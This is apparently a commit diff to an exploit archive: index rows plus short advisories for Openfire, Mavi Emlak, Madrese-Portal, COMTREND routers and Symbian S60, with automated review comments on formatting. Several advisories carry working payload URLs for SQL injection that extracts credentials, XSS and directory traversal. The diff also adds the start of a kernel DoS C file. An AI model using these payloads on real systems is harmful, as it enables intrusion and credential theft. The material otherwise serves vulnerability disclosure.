diff --git a/files.csv b/files.csv
index f93aff1e7..1d559656f 100755
--- a/files.csv
+++ b/files.csv
@@ -29420,7 +29420,6 @@ id,file,description,date,author,platform,type,port
 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
-32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0
 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
 32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
 32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
@@ -29436,3 +29435,25 @@ id,file,description,date,author,platform,type,port 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0 +32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection Vulnerability",2008-12-19,"Moritz Naumann",php,webapps,0 +32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 'group-summary.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 'user-properties.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 'log.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 +32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x 'qdisc_run()' Local Denial of Service Vulnerability",2008-12-23,"Herbert Xu",linux,dos,0 +32683,platforms/asp/webapps/32683.txt,"Mavi Emlak 'newDetail.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 WAV File Parsing Code Execution Vulnerability",2008-12-29,anonymous,windows,remote,0 +32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php 
manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0 +32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 +32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 +32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 +32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 +32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0 +32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0 +32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 +32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 +32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0 +32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0 diff --git a/platforms/asp/webapps/32683.txt b/platforms/asp/webapps/32683.txt new file mode 100755 index 000000000..d723d363f --- /dev/null 
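Review bot: Row 32680 is titled `Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability` while rows 32677–32679 use `Openfire <= 3.6.2`, although all four advisory files added in this commit carry the same sentence, "Openfire 3.6.2 is vulnerable; prior versions may also be affected". I would write `"Openfire <= 3.6.2 'log.jsp' Directory Traversal Vulnerability"` so that a version search of the index returns the traversal entry alongside the three XSS entries. The id sequence in this hunk also goes from 32690 straight to 32692; that may be intentional, but it is worth confirming that 32691 was not dropped from the batch.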
+++ b/platforms/asp/webapps/32683.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33041/info
+
+Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar
\ No newline at end of file
diff --git a/platforms/asp/webapps/32687.txt b/platforms/asp/webapps/32687.txt
new file mode 100755
index 000000000..26258cdca
--- /dev/null
+++ b/platforms/asp/webapps/32687.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33045/info
+
+Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
+
+http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1
\ No newline at end of file
diff --git a/platforms/hardware/dos/32692.txt b/platforms/hardware/dos/32692.txt
new file mode 100755
index 000000000..5b7010445
--- /dev/null
+++ b/platforms/hardware/dos/32692.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/33072/info
+
+Symbian S60 is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to prevent users from sending or receiving SMS or MMS messages.
+
+This issue affects handsets using Symbian S60.
+
+The following example message is available:
+
+"123456789@123456789.1234567890123 "
+
diff --git a/platforms/hardware/remote/32681.txt b/platforms/hardware/remote/32681.txt
new file mode 100755
index 000000000..aaefb59b5
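Review bot: platforms/asp/webapps/32683.txt is added without a final newline (the `\ No newline at end of file` marker), and the same marker follows 32687.txt, 32681.txt and 32677.txt through 32680.txt in this commit; ending each entry with a newline keeps concatenated or grepped output from running one entry into the next. Unlike the Openfire entries, 32683.txt and 32687.txt also name no affected version or fixed release, so a defender triaging exposure has only the page and parameter names to match on. If the source advisory gives none, a line such as `Affected versions: not stated in the source advisory` would make that gap explicit.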
--- /dev/null
+++ b/platforms/hardware/remote/32681.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/32975/info
+
+COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities:
+
+- Multiple unauthorized-access vulnerabilities
+- An information-disclosure vulnerability
+- Multiple cross-site scripting vulnerabilities
+- A denial-of-service vulnerability
+- Multiple buffer-overflow vulnerabilities
+
+Attackers can exploit these issues to compromise the affected device, obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
+
+The following firmware versions are vulnerable; additional versions may also be affected:
+CT-536 A101-302JAZ-C01_R05
+HG-536+ A101-302JAZ-C01_R05 and A101-302JAZ-C03_R14.A2pB021g.d15h
+
+http://www.example.com/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http://www,example.com/password.html
\ No newline at end of file
diff --git a/platforms/hardware/webapps/32659.txt b/platforms/hardware/webapps/32659.txt
deleted file mode 100755
index 389c171ef..000000000
--- a/platforms/hardware/webapps/32659.txt
+++ /dev/null
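Review bot: The last added line of platforms/hardware/remote/32681.txt holds two example URLs separated only by a space, and the second is written `http://www,example.com/password.html` with a comma in the host name. The hunk header counts 17 added lines, so both URLs do appear to sit on one line of the file. I would put each on its own line and correct the host to `www.example.com`, so that tooling which extracts request paths from the entry (for example to write a detection rule for `scvrtsrv.cmd` or `password.html` requests) parses them cleanly. The entry also lists five vulnerability classes without saying which class each URL illustrates; a short label before each URL would let a reader map them.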
@@ -1,53 +0,0 @@ -Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability - -Google dork : N/A - -Date : 02/04/2014 - -Exploit Author : Blessen Thomas - -Vendor Homepage : http://www.icommtele.com/ - -Software Link : N/A - -Version : ICOMM 610 - -Tested on : Device software version 01.01.08.991 (10/01/2010) - -Type of Application : Modem Web Application - -CVE : N/A - -Cross Site Request Forgery - -It was observed that this modem's Web Application , suffers from Cross-site - -request forgery through which attacker can manipulate user data via sending -him malicious craft url. - - -At attacker could change the password of the victim's account without the -victim's knowledge as the - -application is not having a security token implemented. - - -The Modem's application is not using any security token to prevent it -against CSRF. You can manipulate any userdata. PoC and Exploit to change -user password: In the POC the IP address in the POST is the modems IP -address. - - - - - -
- - - -
diff --git a/platforms/jsp/webapps/32677.txt b/platforms/jsp/webapps/32677.txt
new file mode 100755
index 000000000..ff38057a7
--- /dev/null
+++ b/platforms/jsp/webapps/32677.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32937/info
+
+Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Openfire 3.6.2 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/32678.txt b/platforms/jsp/webapps/32678.txt
new file mode 100755
index 000000000..c99c4f345
--- /dev/null
+++ b/platforms/jsp/webapps/32678.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32938/info
+
+Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Openfire 3.6.2 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/user-properties.jsp?username=%3C[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/32679.txt b/platforms/jsp/webapps/32679.txt
new file mode 100755
index 000000000..b44e43a6d
--- /dev/null
+++ b/platforms/jsp/webapps/32679.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32940/info
+
+Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Openfire 3.6.2 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss]
\ No newline at end of file
diff --git a/platforms/jsp/webapps/32680.txt b/platforms/jsp/webapps/32680.txt
new file mode 100755
index 000000000..c01219c1e
--- /dev/null
+++ b/platforms/jsp/webapps/32680.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32945/info
+
+Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Openfire 3.6.2 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup
\ No newline at end of file
diff --git a/platforms/linux/dos/32682.c b/platforms/linux/dos/32682.c
new file mode 100755
index 000000000..94942e200
--- /dev/null
+++ b/platforms/linux/dos/32682.c
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/32985/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users.
+
+Versions prior to Linux kernel 2.6.25 are vulnerable.
+
+#include